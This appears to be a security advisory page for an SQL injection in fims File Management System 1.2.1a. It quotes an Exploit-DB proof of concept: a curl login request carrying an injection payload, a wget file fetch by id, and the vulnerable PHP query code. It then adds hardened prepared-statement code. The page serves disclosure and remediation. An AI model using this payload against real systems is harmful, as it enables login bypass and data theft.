Vendor: fims - File Management System
By: Skraps
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: fims - File Management System
Affected Version From: 1.2.1a
Affected Version To: 1.2.1a
Patch Exists: NO
Related CWE: N/A
CPE: fims
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

fims – File Management System <= 1.2.1a SQL Injection and Vulnerability

An attacker can exploit a SQL injection vulnerability in fims - File Management System <= 1.2.1a by sending a crafted login request: the email and password values are concatenated directly into the SQL query, so malicious input alters the query. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Exploit-DB raw data:

# Exploit Title: fims - File Management System <= 1.2.1a SQL Injection and Vulnerability
# Date: 2011-10-19
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://fims.codeplex.com/
# Version: 1.2.1a (tested)


---------------
PoC (POST or GET data)
---------------
curl --data "l=help@juno.com&password=word') or id=ABS('1" http://127.0.0.1/fims/?p=1
 
wget "http://127.0.0.1/fims/index.php?f={anyfile number}"

---------------
Vulnerable code
---------------
Line 18 of index.php:
  // email and password come straight from the request, with no validation
  if (login($g_db, $_REQUEST[email], $_REQUEST[password]))
Line 117 of functions.php:
        function login($db, $email, $password)
        {
                // $email and $password are interpolated into the SQL string unquoted/unescaped:
                // a quote in either value ends the string literal and the rest becomes SQL
                $rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
                if ($db->numrows($rs)>0) return true;
                else return false;
        }

Line 51 of index.php:
                if (isset($_REQUEST[f]))
                {
                        // assert() only emits a warning under PHP's default settings (assert.bail=0),
                        // so a non-numeric f is logged but execution continues into get_file_data()
                        assert(is_numeric($_REQUEST[f]));
                        $file = get_file_data($g_db, $_REQUEST[f]);
                        header("Accept-Ranges: bytes");
                        header("Content-Length: ".filesize("files/".$file[id]));
                        header("Content-Type: {$file[mime]}");
                        header("Content-Disposition: inline; filename=\"{$file['label']}\";");
                        readfile("files/".$file[id]);
                }
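As an added example (not code from the fims project or from the Exploit-DB post), the two vulnerable paths above rewritten with PDO prepared statements and an explicit numeric check; it assumes a PDO connection `$pdo` replaces `$g_db`, keeps the `fims_user` table and the `email`/`password` columns from the original query, and uses a hypothetical `get_file_data_safe()` in place of the original `get_file_data()`.

```php
<?php
// Hardened replacement for login() from functions.php (added example, not fims code).
// Assumes $pdo is a PDO connection; table/column names are those in the original query.
function login_safe(PDO $pdo, string $email, string $password): bool
{
    // Placeholders keep user input out of the SQL text: the "') or id=ABS('1"
    // value from the PoC is bound as a literal string and never becomes SQL syntax.
    // Unsalted MD5 is kept only to match the existing fims_user schema; a migration
    // to password_hash()/password_verify() is the proper fix for password storage.
    $stmt = $pdo->prepare(
        'SELECT 1 FROM fims_user WHERE email = :email AND password = MD5(:password) LIMIT 1'
    );
    $stmt->execute([':email' => $email, ':password' => $password]);
    return $stmt->fetchColumn() !== false;
}

// Replacement for the assert(is_numeric(...)) guard at index.php line 51.
// Returns null for anything that is not a plain non-negative integer, so the
// caller can reject the request instead of relying on assert(), which by
// default only warns and lets execution continue.
function file_id_from_request(array $request): ?int
{
    if (!isset($request['f']) || !ctype_digit((string) $request['f'])) {
        return null;
    }
    return (int) $request['f'];
}

// Hypothetical parameterised lookup standing in for get_file_data(); the file
// table name is a placeholder because the page does not show it.
function get_file_data_safe(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, mime, label FROM FILE_TABLE_PLACEHOLDER WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage at the download path: reject bad ids up front and 404 on unknown files.
$id = file_id_from_request($_REQUEST);
if ($id === null) {
    http_response_code(400);
    exit('invalid file id');
}
$file = get_file_data_safe($pdo, $id);
if ($file === null) {
    http_response_code(404);
    exit('no such file');
}
```

The `MD5(:password)` form keeps the database schema unchanged while closing the injection; the email and password strings are sent to the server separately from the query text.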